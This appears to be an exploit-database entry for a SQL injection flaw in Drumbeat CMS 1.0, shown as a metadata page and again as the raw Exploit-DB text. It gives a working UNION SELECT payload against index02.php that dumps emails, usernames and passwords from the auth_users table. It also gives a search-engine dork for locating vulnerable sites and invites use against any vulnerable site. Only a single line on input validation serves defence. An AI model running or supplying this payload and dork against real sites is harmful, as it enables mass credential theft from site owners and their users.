Drumbeat CMS SQL Injection Exploit

vendor:

Drumbeat CMS

by:

Sora

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: Drumbeat CMS

Affected Version From: Version 1.0

Affected Version To: Version 1.0

Patch Exists: Unknown

Related CWE: Unknown

CPE: drumbeatcms.com.au

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows and Linux

Unknown

Drumbeat CMS SQL Injection Exploit

A SQL injection exploit is found in Drumbeat CMS. The vulnerability exists in where there is an index.php page, such as index02.php?id=5. or index03.php?id=2. Dork: 'Powered by Drumbeat' inurl:index02.php. Code: http://www.site.com/index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--. You can usually replace the http://www.site.com/ with any site that is vulnerable to SQL injection.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Vendor: http://www.drumbeatcms.com.au/
# Version: Version 1.0
# Tested on: Windows and Linux
-----------------------------------------
Drumbeat CMS SQL Injection Exploit
[+] Discovered and notified by Sora
A SQL injection exploit is found in Drumbeat CMS. The vulnerability exists in where there is an index.php page, such as index02.php?id=5. or index03.php?id=2.

Dork: "Powered by Drumbeat" inurl:index02.php

# Code: http://www.site.com/index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--

You can usually replace the http://www.site.com/ with any site that is vulnerable to SQL injection.

Greetz: Bw0mp and the rest of the people from Incursio ex Subter!

# EOF #